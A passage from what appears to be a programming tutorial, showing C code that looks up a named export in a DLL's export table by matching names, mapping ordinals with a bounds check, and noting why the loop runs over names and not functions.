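    for (uint32_t i = 0; i < e->number_of_names; i++) {
        if (strcmp(e->names[i], wanted) != 0)
            continue;
        uint16_t index = e->name_ordinals[i];
        if (index >= e->number_of_functions)
            return 0;  /* malformed table */
        return e->functions[index];
    }
    return 0;
}
```

In this layout the loop bound is the number of names, not the number of functions: a DLL can export functions by ordinal only, in which case the function table is longer than the name tables.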